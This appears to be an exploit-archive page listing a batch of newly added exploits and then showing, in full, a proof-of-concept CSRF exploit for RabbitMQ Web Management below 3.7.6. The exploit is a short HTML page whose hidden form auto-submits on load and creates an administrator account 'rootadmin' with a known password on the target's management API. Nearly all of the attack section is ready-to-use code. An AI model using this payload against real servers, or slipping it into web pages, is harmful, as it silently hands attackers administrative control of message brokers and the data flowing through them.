
16 changes to exploits/shellcodes Nikto 2.1.6 - CSV Injection Pale Moon Browser < 27.9.3 - Use After Free (PoC) Audiograbber 1.83 - Local Buffer Overflow (SEH) Redis-cli < 5.0 - Buffer Overflow (PoC) Microsoft COM for Windows - Privilege Escalation Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authenticaton Bypass Canon MF210/MF220 - Authenticaton Bypass Canon LBP7110Cw - Authentication Bypass Canon LBP6030w - Authentication Bypass Joomla! Component jomres 9.11.2 - Cross-Site Request Forgery RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery Redatam Web Server < 7 - Directory Traversal
24 lines
No EOL
649 B
Text
24 lines
No EOL
649 B
Text
# Exploit Title: RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery
|
|
# Date: 2018-06-17
|
|
# Author: Dolev Farhi
|
|
# Vendor or Software Link: www.rabbitmq.com
|
|
# Version: 3.7.6
|
|
# Tested on: Ubuntu
|
|
|
|
<html>
|
|
<h2>Add RabbitMQ Admin</h2>
|
|
|
|
<body>
|
|
<form name="rabbit" id="rabbit" action="http://Target/api/users/rootadmin" method="POST">
|
|
<input type="hidden" name="username" value="rootadmin" />
|
|
<input type="hidden" name="password" value="rootadmin" />
|
|
<input type="hidden" name="tags" value="administrator" />
|
|
<input type="submit" value="save" />
|
|
</form>
|
|
|
|
<script>
|
|
window.onload = rabbit.submit()
|
|
</script>
|
|
|
|
</body>
|
|
</html> |